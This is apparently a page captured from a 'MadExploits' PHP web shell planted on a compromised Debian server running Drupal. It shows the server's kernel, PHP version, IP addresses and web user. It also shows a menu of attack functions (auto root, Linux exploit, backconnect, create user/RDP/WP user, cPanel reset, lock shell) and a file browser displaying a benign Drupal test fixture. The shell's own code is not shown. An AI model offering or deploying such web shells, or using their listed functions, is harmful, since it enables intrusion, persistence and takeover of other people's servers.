Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.11.13
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
simpletest /
tests /
upgrade /
[ HOME SHELL ]
Name
Size
Permission
Action
drupal-6.bare.database.php
229.95
KB
-rw-r--r--
drupal-6.comments.database.php
747
B
-rw-r--r--
drupal-6.duplicate-permission....
175
B
-rw-r--r--
drupal-6.filled.database.php
563.05
KB
-rw-r--r--
drupal-6.forum.database.php
4.65
KB
-rw-r--r--
drupal-6.locale.database.php
5.33
KB
-rw-r--r--
drupal-6.menu.database.php
3.71
KB
-rw-r--r--
drupal-6.node_type_broken.data...
651
B
-rw-r--r--
drupal-6.translatable.database...
2.22
KB
-rw-r--r--
drupal-6.trigger.database.php
1.6
KB
-rw-r--r--
drupal-6.upload.database.php
9.43
KB
-rw-r--r--
drupal-6.user-no-password-toke...
270
B
-rw-r--r--
drupal-6.user-password-token.d...
1.09
KB
-rw-r--r--
drupal-7.aggregator.database.p...
20.53
KB
-rw-r--r--
drupal-7.bare.minimal.database...
38.91
KB
-rw-r--r--
drupal-7.bare.standard_all.dat...
75.61
KB
-rw-r--r--
drupal-7.field.database.php
480
B
-rw-r--r--
drupal-7.filled.minimal.databa...
40.83
KB
-rw-r--r--
drupal-7.filled.standard_all.d...
95.32
KB
-rw-r--r--
drupal-7.trigger.database.php
509
B
-rw-r--r--
update.aggregator.test
1.46
KB
-rw-r--r--
update.field.test
1.68
KB
-rw-r--r--
update.trigger.test
1.05
KB
-rw-r--r--
update.user.test
928
B
-rw-r--r--
upgrade.comment.test
877
B
-rw-r--r--
upgrade.filter.test
1.85
KB
-rw-r--r--
upgrade.forum.test
2.28
KB
-rw-r--r--
upgrade.locale.test
4.3
KB
-rw-r--r--
upgrade.menu.test
3.68
KB
-rw-r--r--
upgrade.node.test
5.34
KB
-rw-r--r--
upgrade.poll.test
2.05
KB
-rw-r--r--
upgrade.taxonomy.test
8.93
KB
-rw-r--r--
upgrade.test
24.55
KB
-rw-r--r--
upgrade.translatable.test
1.96
KB
-rw-r--r--
upgrade.trigger.test
1.18
KB
-rw-r--r--
upgrade.upload.test
3.89
KB
-rw-r--r--
upgrade.user.test
3.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : drupal-6.menu.database.php
<?php db_insert('variable')->fields(array( 'name', 'value', )) ->values(array( 'name' => 'menu_default_node_menu', 'value' => 's:15:"secondary-links";', )) ->values(array( 'name' => 'menu_primary_links_source', 'value' => 's:15:"secondary-links";', )) ->values(array( 'name' => 'menu_secondary_links_source', 'value' => 's:13:"primary-links";', )) ->execute(); // Add some links to the menus. db_insert('menu_links')->fields(array( 'menu_name', 'mlid', 'plid', 'link_path', 'router_path', 'link_title', 'options', 'module', 'hidden', 'external', 'has_children', 'expanded', 'weight', 'depth', 'customized', 'p1', 'p2', 'p3', 'p4', 'p5', 'p6', 'p7', 'p8', 'p9', 'updated', )) ->values(array( 'menu_name' => 'navigation', 'mlid' => '201', 'plid' => '0', 'link_path' => 'node/add', 'router_path' => 'node/add', 'link_title' => 'nodeadd-navigation', 'options' => 'a:0:{}', 'module' => 'menu', 'hidden' => '0', 'external' => '0', 'has_children' => '1', 'expanded' => '0', 'weight' => '1', 'depth' => '1', 'customized' => '0', 'p1' => '201', 'p2' => '0', 'p3' => '0', 'p4' => '0', 'p5' => '0', 'p6' => '0', 'p7' => '0', 'p8' => '0', 'p9' => '0', 'updated' => '0', )) ->values(array( 'menu_name' => 'primary-links', 'mlid' => '204', 'plid' => '0', 'link_path' => 'node/add', 'router_path' => 'node/add', 'link_title' => 'nodeadd-primary', 'options' => 'a:0:{}', 'module' => 'menu', 'hidden' => '0', 'external' => '0', 'has_children' => '1', 'expanded' => '0', 'weight' => '1', 'depth' => '1', 'customized' => '0', 'p1' => '204', 'p2' => '0', 'p3' => '0', 'p4' => '0', 'p5' => '0', 'p6' => '0', 'p7' => '0', 'p8' => '0', 'p9' => '0', 'updated' => '0', )) ->values(array( 'menu_name' => 'secondary-links', 'mlid' => '205', 'plid' => '0', 'link_path' => 'node/add', 'router_path' => 'node/add', 'link_title' => 'nodeadd-secondary', 'options' => 'a:0:{}', 'module' => 'menu', 'hidden' => '0', 'external' => '0', 'has_children' => '1', 'expanded' => '0', 'weight' => '1', 'depth' => '1', 'customized' => '0', 'p1' => '205', 'p2' => '0', 'p3' => '0', 'p4' => '0', 'p5' => '0', 'p6' => '0', 'p7' => '0', 'p8' => '0', 'p9' => '0', 'updated' => '0', )) ->values(array( 'menu_name' => 'secondary-links', 'mlid' => '206', 'plid' => '0', 'link_path' => 'node', 'router_path' => 'node', 'link_title' => 'node-page-with-query', 'options' => 'a:2:{s:5:"query";s:14:"page=1&node=10";s:10:"attributes";a:1:{s:5:"title";s:0:"";}}', 'module' => 'menu', 'hidden' => '0', 'external' => '0', 'has_children' => '0', 'expanded' => '0', 'weight' => '2', 'depth' => '1', 'customized' => '1', 'p1' => '206', 'p2' => '0', 'p3' => '0', 'p4' => '0', 'p5' => '0', 'p6' => '0', 'p7' => '0', 'p8' => '0', 'p9' => '0', 'updated' => '0', )) ->execute(); db_insert('blocks')->fields(array( 'bid', 'module', 'delta', 'theme', 'status', 'weight', 'region', 'custom', 'throttle', 'visibility', 'pages', 'title', 'cache', )) ->values(array( 'bid' => '4', 'module' => 'menu', 'delta' => 'primary-links', 'theme' => 'garland', 'status' => '1', 'weight' => '0', 'region' => 'left', 'custom' => '0', 'throttle' => '0', 'visibility' => '0', 'pages' => '', 'title' => 'My Primary Links', 'cache' => '-1', )) ->values(array( 'bid' => '5', 'module' => 'menu', 'delta' => 'secondary-links', 'theme' => 'garland', 'status' => '1', 'weight' => '0', 'region' => 'left', 'custom' => '0', 'throttle' => '0', 'visibility' => '0', 'pages' => '', 'title' => 'My Secondary Links', 'cache' => '-1', )) ->execute();
Close